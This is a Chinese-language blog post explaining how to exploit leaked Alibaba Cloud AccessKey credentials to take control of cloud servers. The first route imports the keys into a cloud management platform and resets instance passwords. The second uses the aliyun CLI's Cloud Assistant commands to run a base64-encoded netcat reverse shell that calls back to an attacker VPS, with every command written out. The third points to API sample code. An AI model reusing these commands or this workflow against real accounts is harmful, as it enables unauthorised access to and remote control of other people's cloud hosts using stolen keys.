云服务 Accesskey/Access Key Secret泄露利用

云服务 Accesskey/Access Key Secret泄露利用

在渗透/信息搜集过程中,经常会看到某云的ak(并非oss对象云存储)。之前不太会利用,最近研究了下,大致可以分成三种方式利用

1、利用第三方云管平台

优点:操作简单,使用便捷,多云平台兼容

缺点:一些特定api并未开放,功能不完全,主机数量多需要付费导入。

注册并登录行云管家

https://yun.cloudbility.com/

选择云、并根据搜集到的ak信息导入

导入后界面》》》

可以看到可以通过web或者本地登陆的方式远程操作服务器,不过当前是需要知道服务器密码的,但是openapi提供了一个修改服务器密码的功能,我们就可以通过修改密码后再使用ssh登录到目标主机。
修改和重启过程中阿里云并没有给我发短信。

重置后就可以直接通过web termius直接登录了。

2、利用云服务商命令行工具

优点:原生,基于openapi打造,用于管理专用云资源的工具。

缺点:不好操作,需要查询手册和api使用手册。

在网上找到了aws相关的,搜了下,找到了阿里云的cli,所以接下来我就用阿里云cli来示范。
aws相关文章:https://www.freebuf.com/articles/web/198425.html
阿里云命令行工具:https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md
https://shell.aliyun.com/#/
aliyun <product> <operation> [--parameter1 value1 --parameter2 value2 ...]
相关说明和使用手册我会在最后面引用连接中补上。

  • 配置ak信息
  • 在DescribeRegions查询最新地域列表
  • 给目标主机通过InstallCloudAssistant安装云助手
  • CreatCommands
  • InvokeCommands

将反弹shell的命令进行base64加密。
echo "mknod backpipe p && nc 136.xxx.xxx.xxx 6666 0<backpipe | /bin/bash 1>backpipe" | base64
公网的vps上监听下6666端口

这里我配置好了ak的相关信息
aliyun configure

获取最新地域列表:
shell@Alicloud:~$ aliyun ecs DescribeRegions

我是北京的机器-也就是华北2的机房。所以接下来所有的RegionId的值就都是cn-beijing了

安装云助手客户端
这里官方手册说的比较清楚。所以就不再演示。
https://help.aliyun.com/document_detail/64921.html?spm=a2c4g.11186623.2.11.326d4b97Ac4sBT#concept-wtg-32x-ydb

需要说一点就是那个第三步中reboot参数已经更改成只需要实例id了。详情看这个手册吧。

新建了一个云助手命令,名称为shell,执行命令的内容需要base64加密,就将刚刚base64转换的命令给CommandContent。

shell@Alicloud:~$ aliyun ecs CreateCommand --CommandContent bWtub2QgYmFja3BpcGUgcCAmJiBuYyAxMzYuMjQ0Ljg2LjE5NSA2NjY2IDA8YmFja3BpcGUgfCAvYmluL2Jhc2ggMT5iYWNrcGlwZQo= --Name shell --RegionId cn-beijing --Type RunShellScript
{        
        "RequestId": "622CDB58-4568-4423-A893-000DD85F6F42",
    "CommandId": "c-f07b9b2cf5ae421e92edebb40b6542a5"
}

使用InvokeCommand执行云助手命令

shell@Alicloud:~$ aliyun ecs InvokeCommand --CommandId c-f07b9b2cf5ae421e92edebb40b6542a5 --InstanceId.1 i-2ze2z84xrgnvn40fedde --RegionId cn-beijing
{        
"RequestId": "49CDCB2A-C5E5-46F3-A341-CE994AC8C614",        
"InvokeId": "t-51e9ee6aca774011892c5c92ebdb8833"
}


至此,云主机ak反弹shell就已经完成

3、利用代码操作

https://api.aliyun.com/#/?product=Ecs&api=InvokeCommand
这里有大部分api操作的示例代码,并且能在线调试。也是比较方便的一种。
过一阵可能会写一个相关的脚本吧。

本文链接:

http://8sec.cc/index.php/archives/279/
1 + 6 =
快来做第一个评论的人吧~